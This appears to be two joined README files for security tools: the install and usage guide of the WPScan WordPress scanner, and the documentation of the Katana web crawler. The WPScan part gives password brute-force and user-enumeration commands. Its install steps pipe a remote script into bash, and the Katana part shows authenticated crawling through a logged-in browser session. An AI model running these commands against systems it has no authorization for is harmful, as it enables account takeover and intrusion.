sudo apt-get install gcc git ruby ruby-dev libcurl4-openssl-dev make zlib1g-dev
### Installing dependencies on Fedora
sudo dnf install gcc ruby-devel libxml2 libxml2-devel libxslt libxslt-devel libcurl-devel patch rpm-build
### Installing dependencies on Arch Linux
pacman -Syu ruby
pacman -Syu libyaml
### Installing dependencies on macOS
Apple Xcode, Command Line Tools and the libffi are needed (to be able to install the FFI gem), See [http://stackoverflow.com/questions/17775115/cant-setup-ruby-environment-installing-fii-gem-error](http://stackoverflow.com/questions/17775115/cant-setup-ruby-environment-installing-fii-gem-error)
## Installing with RVM (recommended when doing a manual install)
If you are using GNOME Terminal, there are some steps required before executing the commands. See here for more information:
https://rvm.io/integration/gnome-terminal#integrating-rvm-with-gnome-terminal
# Install all prerequisites for your OS (look above)
cd ~
curl -sSL https://rvm.io/mpapis.asc | gpg --import -
curl -sSL https://get.rvm.io | bash -s stable
source ~/.rvm/scripts/rvm
echo "source ~/.rvm/scripts/rvm" >> ~/.bashrc
rvm install 2.5.0
rvm use 2.5.0 --default
echo "gem: --no-ri --no-rdoc" > ~/.gemrc
git clone https://github.com/wpscanteam/wpscan.git
cd wpscan
gem install bundler
bundle install --without test
## Installing manually (not recommended)
git clone https://github.com/wpscanteam/wpscan.git
cd wpscan
sudo gem install bundler && bundle install --without test
# KNOWN ISSUES
- no such file to load -- rubygems
```update-alternatives --config ruby```
And select your ruby version
See [https://github.com/wpscanteam/wpscan/issues/148](https://github.com/wpscanteam/wpscan/issues/148)
# WPSCAN ARGUMENTS
--update Update the database to the latest version.
--url | -u <target url> The WordPress URL/domain to scan.
--force | -f Forces WPScan to not check if the remote site is running WordPress.
--enumerate | -e [option(s)] Enumeration.
option :
u usernames from id 1 to 10
u[10-20] usernames from id 10 to 20 (you must write [] chars)
p plugins
vp only vulnerable plugins
ap all plugins (can take a long time)
tt timthumbs
t themes
vt only vulnerable themes
at all themes (can take a long time)
Multiple values are allowed : "-e tt,p" will enumerate timthumbs and plugins
If no option is supplied, the default is "vt,tt,u,vp"
--exclude-content-based "<regexp or string>"
Used with the enumeration option, will exclude all occurrences based on the regexp or string supplied.
You do not need to provide the regexp delimiters, but you must write the quotes (simple or double).
--config-file | -c <config file> Use the specified config file, see the example.conf.json.
--user-agent | -a <User-Agent> Use the specified User-Agent.
--cookie <string> String to read cookies from.
--random-agent | -r Use a random User-Agent.
--follow-redirection If the target url has a redirection, it will be followed without asking if you wanted to do so or not
--batch Never ask for user input, use the default behaviour.
--no-color Do not use colors in the output.
--log [filename] Creates a log.txt file with WPScan's output if no filename is supplied. Otherwise the filename is used for logging.
--no-banner Prevents the WPScan banner from being displayed.
--disable-accept-header Prevents WPScan sending the Accept HTTP header.
--disable-referer Prevents setting the Referer header.
--disable-tls-checks Disables SSL/TLS certificate verification.
--wp-content-dir <wp content dir> WPScan try to find the content directory (ie wp-content) by scanning the index page, however you can specify it.
Subdirectories are allowed.
--wp-plugins-dir <wp plugins dir> Same thing than --wp-content-dir but for the plugins directory.
If not supplied, WPScan will use wp-content-dir/plugins. Subdirectories are allowed
--proxy <[protocol://]host:port> Supply a proxy. HTTP, SOCKS4 SOCKS4A and SOCKS5 are supported.
If no protocol is given (format host:port), HTTP will be used.
--proxy-auth <username:password> Supply the proxy login credentials.
--basic-auth <username:password> Set the HTTP Basic authentication.
--wordlist | -w <wordlist> Supply a wordlist for the password brute forcer.
If the "-" option is supplied, the wordlist is expected via STDIN.
--username | -U <username> Only brute force the supplied username.
--usernames <path-to-file> Only brute force the usernames from the file.
--cache-dir <cache-directory> Set the cache directory.
--cache-ttl <cache-ttl> Typhoeus cache TTL.
--request-timeout <request-timeout> Request Timeout.
--connect-timeout <connect-timeout> Connect Timeout.
--threads | -t <number of threads> The number of threads to use when multi-threading requests.
--throttle <milliseconds> Milliseconds to wait before doing another web request. If used, the --threads should be set to 1.
--help | -h This help screen.
--verbose | -v Verbose output.
--version Output the current version and exit.
# WPSCAN EXAMPLES
Do 'non-intrusive' checks...
```ruby wpscan.rb --url www.example.com```
Do wordlist password brute force on enumerated users using 50 threads...
```ruby wpscan.rb --url www.example.com --wordlist darkc0de.lst --threads 50```
Do wordlist password brute force on enumerated users using STDIN as the wordlist...
```crunch 5 13 -f charset.lst mixalpha | ruby wpscan.rb --url www.example.com --wordlist -```
Do wordlist password brute force on the 'admin' username only...
```ruby wpscan.rb --url www.example.com --wordlist darkc0de.lst --username admin```
Enumerate installed plugins...
```ruby wpscan.rb --url www.example.com --enumerate p```
Run all enumeration tools...
```ruby wpscan.rb --url www.example.com --enumerate```
Use custom content directory...
```ruby wpscan.rb -u www.example.com --wp-content-dir custom-content```
Update WPScan's databases...
```ruby wpscan.rb --update```
Debug output...
```ruby wpscan.rb --url www.example.com --debug-output 2>debug.log```
# PROJECT HOME
[http://www.wpscan.org](http://www.wpscan.org)
# VULNERABILITY DATABASE
[https://wpvulndb.com](https://wpvulndb.com)
# GIT REPOSITORY
[https://github.com/wpscanteam/wpscan](https://github.com/wpscanteam/wpscan)
# ISSUES
[https://github.com/wpscanteam/wpscan/issues](https://github.com/wpscanteam/wpscan/issues)
# DEVELOPER DOCUMENTATION
[http://rdoc.info/github/wpscanteam/wpscan/frames](http://rdoc.info/github/wpscanteam/wpscan/frames)
|
<h1 align="center">
<img src="https://user-images.githubusercontent.com/8293321/196779266-421c79d4-643a-4f73-9b54-3da379bbac09.png" alt="katana" width="200px">
<br>
</h1>
<h4 align="center">A next-generation crawling and spidering framework</h4>
<p align="center">
<a href="https://goreportcard.com/report/github.com/projectdiscovery/katana"><img src="https://goreportcard.com/badge/github.com/projectdiscovery/katana"></a>
<a href="https://github.com/projectdiscovery/katana/issues"><img src="https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat"></a>
<a href="https://github.com/projectdiscovery/katana/releases"><img src="https://img.shields.io/github/release/projectdiscovery/katana"></a>
<a href="https://twitter.com/pdiscoveryio"><img src="https://img.shields.io/twitter/follow/pdiscoveryio.svg?logo=twitter"></a>
<a href="https://discord.gg/projectdiscovery"><img src="https://img.shields.io/discord/695645237418131507.svg?logo=discord"></a>
</p>
<p align="center">
<a href="#features">Features</a> •
<a href="#installation">Installation</a> •
<a href="#usage">Usage</a> •
<a href="#scope-control">Scope</a> •
<a href="#crawler-configuration">Config</a> •
<a href="#filters">Filters</a> •
<a href="https://discord.gg/projectdiscovery">Join Discord</a>
</p>
# Features
![image](https://user-images.githubusercontent.com/8293321/199371558-daba03b6-bf9c-4883-8506-76497c6c3a44.png)
- Fast And fully configurable web crawling
- **Standard** and **Headless** mode support
- **JavaScript** parsing / crawling
- Customizable **automatic form filling**
- **Scope control** - Preconfigured field / Regex
- **Customizable output** - Preconfigured fields
- INPUT - **STDIN**, **URL** and **LIST**
- OUTPUT - **STDOUT**, **FILE** and **JSON**
## Installation
katana requires **Go 1.18** to install successfully. To install, just run the below command or download pre-compiled binary from [release page](https://github.com/projectdiscovery/katana/releases).
```console
go install github.com/projectdiscovery/katana/cmd/katana@latest
```
**More options to install / run katana-**
<details>
<summary>Docker</summary>
> To install / update docker to latest tag -
```sh
docker pull projectdiscovery/katana:latest
```
> To run katana in standard mode using docker -
```sh
docker run projectdiscovery/katana:latest -u https://tesla.com
```
> To run katana in headless mode using docker -
```sh
docker run projectdiscovery/katana:latest -u https://tesla.com -system-chrome -headless
```
</details>
<details>
<summary>Ubuntu</summary>
> It's recommended to install the following prerequisites -
```sh
sudo apt update
sudo snap refresh
sudo apt install zip curl wget git
sudo snap install golang --classic
wget -q -O - https://dl-ssl.google.com/linux/linux_signing_key.pub | sudo apt-key add -
sudo sh -c 'echo "deb http://dl.google.com/linux/chrome/deb/ stable main" >> /etc/apt/sources.list.d/google.list'
sudo apt update
sudo apt install google-chrome-stable
```
> install katana -
```sh
go install github.com/projectdiscovery/katana/cmd/katana@latest
```
</details>
## Usage
```console
katana -h
```
This will display help for the tool. Here are all the switches it supports.
```console
Katana is a fast crawler focused on execution in automation
pipelines offering both headless and non-headless crawling.
Usage:
./katana [flags]
Flags:
INPUT:
-u, -list string[] target url / list to crawl
CONFIGURATION:
-r, -resolvers string[] list of custom resolver (file or comma separated)
-d, -depth int maximum depth to crawl (default 3)
-jc, -js-crawl enable endpoint parsing / crawling in javascript file
-jsl, -jsluice enable jsluice parsing in javascript file (memory intensive)
-ct, -crawl-duration value maximum duration to crawl the target for (s, m, h, d) (default s)
-kf, -known-files string enable crawling of known files (all,robotstxt,sitemapxml)
-mrs, -max-response-size int maximum response size to read (default 9223372036854775807)
-timeout int time to wait for request in seconds (default 10)
-aff, -automatic-form-fill enable automatic form filling (experimental)
-fx, -form-extraction extract form, input, textarea & select elements in jsonl output
-retry int number of times to retry the request (default 1)
-proxy string http/socks5 proxy to use
-H, -headers string[] custom header/cookie to include in all http request in header:value format (file)
-config string path to the katana configuration file
-fc, -form-config string path to custom form configuration file
-flc, -field-config string path to custom field configuration file
-s, -strategy string Visit strategy (depth-first, breadth-first) (default "depth-first")
-iqp, -ignore-query-params Ignore crawling same path with different query-param values
-tlsi, -tls-impersonate enable experimental client hello (ja3) tls randomization
DEBUG:
-health-check, -hc run diagnostic check up
-elog, -error-log string file to write sent requests error log
HEADLESS:
-hl, -headless enable headless hybrid crawling (experimental)
-sc, -system-chrome use local installed chrome browser instead of katana installed
-sb, -show-browser show the browser on the screen with headless mode
-ho, -headless-options string[] start headless chrome with additional options
-nos, -no-sandbox start headless chrome in --no-sandbox mode
-cdd, -chrome-data-dir string path to store chrome browser data
-scp, -system-chrome-path string use specified chrome browser for headless crawling
-noi, -no-incognito start headless chrome without incognito mode
-cwu, -chrome-ws-url string use chrome browser instance launched elsewhere with the debugger listening at this URL
-xhr, -xhr-extraction extract xhr request url,method in jsonl output
SCOPE:
-cs, -crawl-scope string[] in scope url regex to be followed by crawler
-cos, -crawl-out-scope string[] out of scope url regex to be excluded by crawler
-fs, -field-scope string pre-defined scope field (dn,rdn,fqdn) (default "rdn")
-ns, -no-scope disables host based default scope
-do, -display-out-scope display external endpoint from scoped crawling
FILTER:
-mr, -match-regex string[] regex or list of regex to match on output url (cli, file)
-fr, -filter-regex string[] regex or list of regex to filter on output url (cli, file)
-f, -field string field to display in output (url,path,fqdn,rdn,rurl,qurl,qpath,file,ufile,key,value,kv,dir,udir)
-sf, -store-field string field to store in per-host output (url,path,fqdn,rdn,rurl,qurl,qpath,file,ufile,key,value,kv,dir,udir)
-em, -extension-match string[] match output for given extension (eg, -em php,html,js)
-ef, -extension-filter string[] filter output for given extension (eg, -ef png,css)
-mdc, -match-condition string match response with dsl based condition
-fdc, -filter-condition string filter response with dsl based condition
RATE-LIMIT:
-c, -concurrency int number of concurrent fetchers to use (default 10)
-p, -parallelism int number of concurrent inputs to process (default 10)
-rd, -delay int request delay between each request in seconds
-rl, -rate-limit int maximum requests to send per second (default 150)
-rlm, -rate-limit-minute int maximum number of requests to send per minute
UPDATE:
-up, -update update katana to latest version
-duc, -disable-update-check disable automatic katana update check
OUTPUT:
-o, -output string file to write output to
-sr, -store-response store http requests/responses
-srd, -store-response-dir string store http requests/responses to custom directory
-or, -omit-raw omit raw requests/responses from jsonl output
-ob, -omit-body omit response body from jsonl output
-j, -jsonl write output in jsonl format
-nc, -no-color disable output content coloring (ANSI escape codes)
-silent display output only
-v, -verbose display verbose output
-debug display debug output
-version display project version
```
## Running Katana
### Input for katana
**katana** requires **url** or **endpoint** to crawl and accepts single or multiple inputs.
Input URL can be provided using `-u` option, and multiple values can be provided using comma-separated input, similarly **file** input is supported using `-list` option and additionally piped input (stdin) is also supported.
#### URL Input
```sh
katana -u https://tesla.com
```
#### Multiple URL Input (comma-separated)
```sh
katana -u https://tesla.com,https://google.com
```
#### List Input
```bash
$ cat url_list.txt
https://tesla.com
https://google.com
```
```
katana -list url_list.txt
```
#### STDIN (piped) Input
```sh
echo https://tesla.com | katana
```
```sh
cat domains | httpx | katana
```
Example running katana -
```console
katana -u https://youtube.com
__ __
/ /_____ _/ /____ ____ ___ _
/ '_/ _ / __/ _ / _ \/ _ /
/_/\_\\_,_/\__/\_,_/_//_/\_,_/ v0.0.1
projectdiscovery.io
[WRN] Use with caution. You are responsible for your actions.
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
https://www.youtube.com/
https://www.youtube.com/about/
https://www.youtube.com/about/press/
https://www.youtube.com/about/copyright/
https://www.youtube.com/t/contact_us/
https://www.youtube.com/creators/
https://www.youtube.com/ads/
https://www.youtube.com/t/terms
https://www.youtube.com/t/privacy
https://www.youtube.com/about/policies/
https://www.youtube.com/howyoutubeworks?utm_campaign=ytgen&utm_source=ythp&utm_medium=LeftNav&utm_content=txt&u=https%3A%2F%2Fwww.youtube.com%2Fhowyoutubeworks%3Futm_source%3Dythp%26utm_medium%3DLeftNav%26utm_campaign%3Dytgen
https://www.youtube.com/new
https://m.youtube.com/
https://www.youtube.com/s/desktop/4965577f/jsbin/desktop_polymer.vflset/desktop_polymer.js
https://www.youtube.com/s/desktop/4965577f/cssbin/www-main-desktop-home-page-skeleton.css
https://www.youtube.com/s/desktop/4965577f/cssbin/www-onepick.css
https://www.youtube.com/s/_/ytmainappweb/_/ss/k=ytmainappweb.kevlar_base.0Zo5FUcPkCg.L.B1.O/am=gAE/d=0/rs=AGKMywG5nh5Qp-BGPbOaI1evhF5BVGRZGA
https://www.youtube.com/opensearch?locale=en_GB
https://www.youtube.com/manifest.webmanifest
https://www.youtube.com/s/desktop/4965577f/cssbin/www-main-desktop-watch-page-skeleton.css
https://www.youtube.com/s/desktop/4965577f/jsbin/web-animations-next-lite.min.vflset/web-animations-next-lite.min.js
https://www.youtube.com/s/desktop/4965577f/jsbin/custom-elements-es5-adapter.vflset/custom-elements-es5-adapter.js
https://www.youtube.com/s/desktop/4965577f/jsbin/webcomponents-sd.vflset/webcomponents-sd.js
https://www.youtube.com/s/desktop/4965577f/jsbin/intersection-observer.min.vflset/intersection-observer.min.js
https://www.youtube.com/s/desktop/4965577f/jsbin/scheduler.vflset/scheduler.js
https://www.youtube.com/s/desktop/4965577f/jsbin/www-i18n-constants-en_GB.vflset/www-i18n-constants.js
https://www.youtube.com/s/desktop/4965577f/jsbin/www-tampering.vflset/www-tampering.js
https://www.youtube.com/s/desktop/4965577f/jsbin/spf.vflset/spf.js
https://www.youtube.com/s/desktop/4965577f/jsbin/network.vflset/network.js
https://www.youtube.com/howyoutubeworks/
https://www.youtube.com/trends/
https://www.youtube.com/jobs/
https://www.youtube.com/kids/
```
## Crawling Mode
### Standard Mode
Standard crawling modality uses the standard go http library under the hood to handle HTTP requests/responses. This modality is much faster as it doesn't have the browser overhead. Still, it analyzes HTTP responses body as is, without any javascript or DOM rendering, potentially missing post-dom-rendered endpoints or asynchronous endpoint calls that might happen in complex web applications depending, for example, on browser-specific events.
### Headless Mode
Headless mode hooks internal headless calls to handle HTTP requests/responses directly within the browser context. This offers two advantages:
- The HTTP fingerprint (TLS and user agent) fully identify the client as a legitimate browser
- Better coverage since the endpoints are discovered analyzing the standard raw response, as in the previous modality, and also the browser-rendered one with javascript enabled.
Headless crawling is optional and can be enabled using `-headless` option.
Here are other headless CLI options -
```console
katana -h headless
Flags:
HEADLESS:
-hl, -headless enable headless hybrid crawling (experimental)
-sc, -system-chrome use local installed chrome browser instead of katana installed
-sb, -show-browser show the browser on the screen with headless mode
-ho, -headless-options string[] start headless chrome with additional options
-nos, -no-sandbox start headless chrome in --no-sandbox mode
-cdd, -chrome-data-dir string path to store chrome browser data
-scp, -system-chrome-path string use specified chrome browser for headless crawling
-noi, -no-incognito start headless chrome without incognito mode
-cwu, -chrome-ws-url string use chrome browser instance launched elsewhere with the debugger listening at this URL
-xhr, -xhr-extraction extract xhr requests
```
*`-no-sandbox`*
----
Runs headless chrome browser with **no-sandbox** option, useful when running as root user.
```console
katana -u https://tesla.com -headless -no-sandbox
```
*`-no-incognito`*
----
Runs headless chrome browser without incognito mode, useful when using the local browser.
```console
katana -u https://tesla.com -headless -no-incognito
```
*`-headless-options`*
----
When crawling in headless mode, additional chrome options can be specified using `-headless-options`, for example -
```console
katana -u https://tesla.com -headless -system-chrome -headless-options --disable-gpu,proxy-server=http://127.0.0.1:8080
```
## Scope Control
Crawling can be endless if not scoped, as such katana comes with multiple support to define the crawl scope.
*`-field-scope`*
----
Most handy option to define scope with predefined field name, `rdn` being default option for field scope.
- `rdn` - crawling scoped to root domain name and all subdomains (e.g. `*example.com`) (default)
- `fqdn` - crawling scoped to given sub(domain) (e.g. `www.example.com` or `api.example.com`)
- `dn` - crawling scoped to domain name keyword (e.g. `example`)
```console
katana -u https://tesla.com -fs dn
```
*`-crawl-scope`*
------
For advanced scope control, `-cs` option can be used that comes with **regex** support.
```console
katana -u https://tesla.com -cs login
```
For multiple in scope rules, file input with multiline string / regex can be passed.
```bash
$ cat in_scope.txt
login/
admin/
app/
wordpress/
```
```console
katana -u https://tesla.com -cs in_scope.txt
```
*`-crawl-out-scope`*
-----
For defining what not to crawl, `-cos` option can be used and also support **regex** input.
```console
katana -u https://tesla.com -cos logout
```
For multiple out of scope rules, file input with multiline string / regex can be passed.
```bash
$ cat out_of_scope.txt
/logout
/log_out
```
```console
katana -u https://tesla.com -cos out_of_scope.txt
```
*`-no-scope`*
----
Katana is default to scope `*.domain`, to disable this `-ns` option can be used and also to crawl the internet.
```console
katana -u https://tesla.com -ns
```
*`-display-out-scope`*
----
As default, when scope option is used, it also applies for the links to display as output, as such **external URLs are default to exclude** and to overwrite this behavior, `-do` option can be used to display all the external URLs that exist in targets scoped URL / Endpoint.
```
katana -u https://tesla.com -do
```
Here is all the CLI options for the scope control -
```console
katana -h scope
Flags:
SCOPE:
-cs, -crawl-scope string[] in scope url regex to be followed by crawler
-cos, -crawl-out-scope string[] out of scope url regex to be excluded by crawler
-fs, -field-scope string pre-defined scope field (dn,rdn,fqdn) (default "rdn")
-ns, -no-scope disables host based default scope
-do, -display-out-scope display external endpoint from scoped crawling
```
## Crawler Configuration
Katana comes with multiple options to configure and control the crawl as the way we want.
*`-depth`*
----
Option to define the `depth` to follow the urls for crawling, the more depth the more number of endpoint being crawled + time for crawl.
```
katana -u https://tesla.com -d 5
```
*`-js-crawl`*
----
Option to enable JavaScript file parsing + crawling the endpoints discovered in JavaScript files, disabled as default.
```
katana -u https://tesla.com -jc
```
*`-crawl-duration`*
----
Option to predefined crawl duration, disabled as default.
```
katana -u https://tesla.com -ct 2
```
*`-known-files`*
----
Option to enable crawling `robots.txt` and `sitemap.xml` file, disabled as default.
```
katana -u https://tesla.com -kf robotstxt,sitemapxml
```
*`-automatic-form-fill`*
----
Option to enable automatic form filling for known / unknown fields, known field values can be customized as needed by updating form config file at `$HOME/.config/katana/form-config.yaml`.
Automatic form filling is experimental feature.
```
katana -u https://tesla.com -aff
```
## Authenticated Crawling
Authenticated crawling involves including custom headers or cookies in HTTP requests to access protected resources. These headers provide authentication or authorization information, allowing you to crawl authenticated content / endpoint. You can specify headers directly in the command line or provide them as a file with katana to perfrom authenticated crawling.
> **Note**: User needs to be manually perform the authentication and export the session cookie / header to file to use with katana.
*`-headers`*
----
Option to add a custom header or cookie to the request.
> Syntax of [headers](https://datatracker.ietf.org/doc/html/rfc7230#section-3.2) in the HTTP specification
Here is an example of adding a cookie to the request:
```
katana -u https://tesla.com -H 'Cookie: usrsess=AmljNrESo'
```
It is also possible to supply headers or cookies as a file. For example:
```
$ cat cookie.txt
Cookie: PHPSESSIONID=XXXXXXXXX
X-API-KEY: XXXXX
TOKEN=XX
```
```
katana -u https://tesla.com -H cookie.txt
```
There are more options to configure when needed, here is all the config related CLI options -
```console
katana -h config
Flags:
CONFIGURATION:
-r, -resolvers string[] list of custom resolver (file or comma separated)
-d, -depth int maximum depth to crawl (default 3)
-jc, -js-crawl enable endpoint parsing / crawling in javascript file
-ct, -crawl-duration int maximum duration to crawl the target for
-kf, -known-files string enable crawling of known files (all,robotstxt,sitemapxml)
-mrs, -max-response-size int maximum response size to read (default 9223372036854775807)
-timeout int time to wait for request in seconds (default 10)
-aff, -automatic-form-fill enable automatic form filling (experimental)
-fx, -form-extraction enable extraction of form, input, textarea & select elements
-retry int number of times to retry the request (default 1)
-proxy string http/socks5 proxy to use
-H, -headers string[] custom header/cookie to include in request
-config string path to the katana configuration file
-fc, -form-config string path to custom form configuration file
-flc, -field-config string path to custom field configuration file
-s, -strategy string Visit strategy (depth-first, breadth-first) (default "depth-first")
```
### Connecting to Active Browser Session
Katana can also connect to active browser session where user is already logged in and authenticated. and use it for crawling. The only requirement for this is to start browser with remote debugging enabled.
Here is an example of starting chrome browser with remote debugging enabled and using it with katana -
**step 1) First Locate path of chrome executable**
| Operating System | Chromium Executable Location | Google Chrome Executable Location |
|------------------|------------------------------|-----------------------------------|
| Windows (64-bit) | `C:\Program Files (x86)\Google\Chromium\Application\chrome.exe` | `C:\Program Files (x86)\Google\Chrome\Application\chrome.exe` |
| Windows (32-bit) | `C:\Program Files\Google\Chromium\Application\chrome.exe` | `C:\Program Files\Google\Chrome\Application\chrome.exe` |
| macOS | `/Applications/Chromium.app/Contents/MacOS/Chromium` | `/Applications/Google Chrome.app/Contents/MacOS/Google Chrome` |
| Linux | `/usr/bin/chromium` | `/usr/bin/google-chrome` |
**step 2) Start chrome with remote debugging enabled and it will return websocker url. For example, on MacOS, you can start chrome with remote debugging enabled using following command** -
```console
$ /Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --remote-debugging-port=9222
DevTools listening on ws://127.0.0.1:9222/devtools/browser/c5316c9c-19d6-42dc-847a-41d1aeebf7d6
```
> Now login to the website you want to crawl and keep the browser open.
**step 3) Now use the websocket url with katana to connect to the active browser session and crawl the website**
```console
katana -headless -u https://tesla.com -cwu ws://127.0.0.1:9222/devtools/browser/c5316c9c-19d6-42dc-847a-41d1aeebf7d6 -no-incognito
```
> **Note**: you can use `-cdd` option to specify custom chrome data directory to store browser data and cookies but that does not save session data if cookie is set to `Session` only or expires after certain time.
## Filters
*`-field`*
----
Katana comes with built in fields that can be used to filter the output for the desired information, `-f` option can be used to specify any of the available fields.
```
-f, -field string field to display in output (url,path,fqdn,rdn,rurl,qurl,qpath,file,key,value,kv,dir,udir)
```
Here is a table with examples of each field and expected output when used -
| FIELD | DESCRIPTION | EXAMPLE |
| ------- | --------------------------- | ------------------------------------------------------------ |
| `url` | URL Endpoint | `https://admin.projectdiscovery.io/admin/login?user=admin&password=admin` |
| `qurl` | URL including query param | `https://admin.projectdiscovery.io/admin/login.php?user=admin&password=admin` |
| `qpath` | Path including query param | `/login?user=admin&password=admin` |
| `path` | URL Path | `https://admin.projectdiscovery.io/admin/login` |
| `fqdn` | Fully Qualified Domain name | `admin.projectdiscovery.io` |
| `rdn` | Root Domain name | `projectdiscovery.io` |
| `rurl` | Root URL | `https://admin.projectdiscovery.io` |
| `ufile` | URL with File | `https://admin.projectdiscovery.io/login.js` |
| `file` | Filename in URL | `login.php` |
| `key` | Parameter keys in URL | `user,password` |
| `value` | Parameter values in URL | `admin,admin` |
| `kv` | Keys=Values in URL | `user=admin&password=admin` |
| `dir` | URL Directory name | `/admin/` |
| `udir` | URL with Directory | `https://admin.projectdiscovery.io/admin/` |
Here is an example of using field option to only display all the urls with query parameter in it -
```
katana -u https://tesla.com -f qurl -silent
https://shop.tesla.com/en_au?redirect=no
https://shop.tesla.com/en_nz?redirect=no
https://shop.tesla.com/product/men_s-raven-lightweight-zip-up-bomber-jacket?sku=1740250-00-A
https://shop.tesla.com/product/tesla-shop-gift-card?sku=1767247-00-A
https://shop.tesla.com/product/men_s-chill-crew-neck-sweatshirt?sku=1740176-00-A
https://www.tesla.com/about?redirect=no
https://www.tesla.com/about/legal?redirect=no
https://www.tesla.com/findus/list?redirect=no
```
### Custom Fields
You can create custom fields to extract and store specific information from page responses using regex rules. These custom fields are defined using a YAML config file and are loaded from the default location at `$HOME/.config/katana/field-config.yaml`. Alternatively, you can use the `-flc` option to load a custom field config file from a different location.
Here is example custom field.
```yaml
- name: email
type: regex
regex:
- '([a-zA-Z0-9._-]+@[a-zA-Z0-9._-]+\.[a-zA-Z0-9_-]+)'
- '([a-zA-Z0-9+._-]+@[a-zA-Z0-9._-]+\.[a-zA-Z0-9_-]+)'
- name: phone
type: regex
regex:
- '\d{3}-\d{8}|\d{4}-\d{7}'
```
When defining custom fields, following attributes are supported:
- **name** (required)
> The value of **name** attribute is used as the `-field` cli option value.
- **type** (required)
> The type of custom attribute, currenly supported option - `regex`
- **part** (optional)
> The part of the response to extract the information from. The default value is `response`, which includes both the header and body. Other possible values are `header` and `body`.
- group (optional)
> You can use this attribute to select a specific matched group in regex, for example: `group: 1`
#### Running katana using custom field:
```console
katana -u https://tesla.com -f email,phone
```
*`-store-field`*
---
To compliment `field` option which is useful to filter output at run time, there is `-sf, -store-fields` option which works exactly like field option except instead of filtering, it stores all the information on the disk under `katana_field` directory sorted by target url.
```
katana -u https://tesla.com -sf key,fqdn,qurl -silent
```
```bash
$ ls katana_field/
https_www.tesla.com_fqdn.txt
https_www.tesla.com_key.txt
https_www.tesla.com_qurl.txt
```
The `-store-field` option can be useful for collecting information to build a targeted wordlist for various purposes, including but not limited to:
- Identifying the most commonly used parameters
- Discovering frequently used paths
- Finding commonly used files
- Identifying related or unknown subdomains
### Katana Filters
*`-extension-match`*
---
Crawl output can be easily matched for specific extension using `-em` option to ensure to display only output containing given extension.
```
katana -u https://tesla.com -silent -em js,jsp,json
```
*`-extension-filter`*
---
Crawl output can be easily filtered for specific extension using `-ef` option which ensure to remove all the urls containing given extension.
```
katana -u https://tesla.com -silent -ef css,txt,md
```
*`-match-regex`*
---
The `-match-regex` or `-mr` flag allows you to filter output URLs using regular expressions. When using this flag, only URLs that match the specified regular expression will be printed in the output.
```
katana -u https://tesla.com -mr 'https://shop\.tesla\.com/*' -silent
```
*`-filter-regex`*
---
The `-filter-regex` or `-fr` flag allows you to filter output URLs using regular expressions. When using this flag, it will skip the URLs that are match the specified regular expression.
```
katana -u https://tesla.com -fr 'https://www\.tesla\.com/*' -silent
```
### Advance Filtering
Katana supports DSL-based expressions for advanced matching and filtering capabilities:
- To match endpoints with a 200 status code:
```shell
katana -u https://www.hackerone.com -mdc 'status_code == 200'
```
- To match endpoints that contain "default" and have a status code other than 403:
```shell
katana -u https://www.hackerone.com -mdc 'contains(endpoint, "default") && status_code != 403'
```
- To match endpoints with PHP technologies:
```shell
katana -u https://www.hackerone.com -mdc 'contains(to_lower(technologies), "php")'
```
- To filter out endpoints running on Cloudflare:
```shell
katana -u https://www.hackerone.com -fdc 'contains(to_lower(technologies), "cloudflare")'
```
DSL functions can be applied to any keys in the jsonl output. For more information on available DSL functions, please visit the [dsl project](https://github.com/projectdiscovery/dsl).
Here are additional filter options -
```console
katana -h filter
Flags:
FILTER:
-mr, -match-regex string[] regex or list of regex to match on output url (cli, file)
-fr, -filter-regex string[] regex or list of regex to filter on output url (cli, file)
-f, -field string field to display in output (url,path,fqdn,rdn,rurl,qurl,qpath,file,ufile,key,value,kv,dir,udir)
-sf, -store-field string field to store in per-host output (url,path,fqdn,rdn,rurl,qurl,qpath,file,ufile,key,value,kv,dir,udir)
-em, -extension-match string[] match output for given extension (eg, -em php,html,js)
-ef, -extension-filter string[] filter output for given extension (eg, -ef png,css)
-mdc, -match-condition string match response with dsl based condition
-fdc, -filter-condition string filter response with dsl based condition
```
## Rate Limit
It's easy to get blocked / banned while crawling if not following target websites limits, katana comes with multiple option to tune the crawl to go as fast / slow we want.
*`-delay`*
-----
option to introduce a delay in seconds between each new request katana makes while crawling, disabled as default.
```
katana -u https://tesla.com -delay 20
```
*`-concurrency`*
-----
option to control the number of urls per target to fetch at the same time.
```
katana -u https://tesla.com -c 20
```
*`-parallelism`*
-----
option to define number of target to process at same time from list input.
```
katana -u https://tesla.com -p 20
```
*`-rate-limit`*
-----
option to use to define max number of request can go out per second.
```
katana -u https://tesla.com -rl 100
```
*`-rate-limit-minute`*
-----
option to use to define max number of request can go out per minute.
```
katana -u https://tesla.com -rlm 500
```
Here is all long / short CLI options for rate limit control -
```console
katana -h rate-limit
Flags:
RATE-LIMIT:
-c, -concurrency int number of concurrent fetchers to use (default 10)
-p, -parallelism int number of concurrent inputs to process (default 10)
-rd, -delay int request delay between each request in seconds
-rl, -rate-limit int maximum requests to send per second (default 150)
-rlm, -rate-limit-minute int maximum number of requests to send per minute
```
## Output
Katana support both file output in plain text format as well as JSON which includes additional information like, `source`, `tag`, and `attribute` name to co-related the discovered endpoint.
*`-output`*
By default, katana outputs the crawled endpoints in plain text format. The results can be written to a file by using the -output option.
```console
katana -u https://example.com -no-scope -output example_endpoints.txt
```
*`-jsonl`*
---
```console
katana -u https://example.com -jsonl | jq .
```
```json
{
"timestamp": "2023-03-20T16:23:58.027559+05:30",
"request": {
"method": "GET",
"endpoint": "https://example.com",
"raw": "GET / HTTP/1.1\r\nHost: example.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\r\nAccept-Encoding: gzip\r\n\r\n"
},
"response": {
"status_code": 200,
"headers": {
"accept_ranges": "bytes",
"expires": "Mon, 27 Mar 2023 10:53:58 GMT",
"last_modified": "Thu, 17 Oct 2019 07:18:26 GMT",
"content_type": "text/html; charset=UTF-8",
"server": "ECS (dcb/7EA3)",
"vary": "Accept-Encoding",
"etag": "\"3147526947\"",
"cache_control": "max-age=604800",
"x_cache": "HIT",
"date": "Mon, 20 Mar 2023 10:53:58 GMT",
"age": "331239"
},
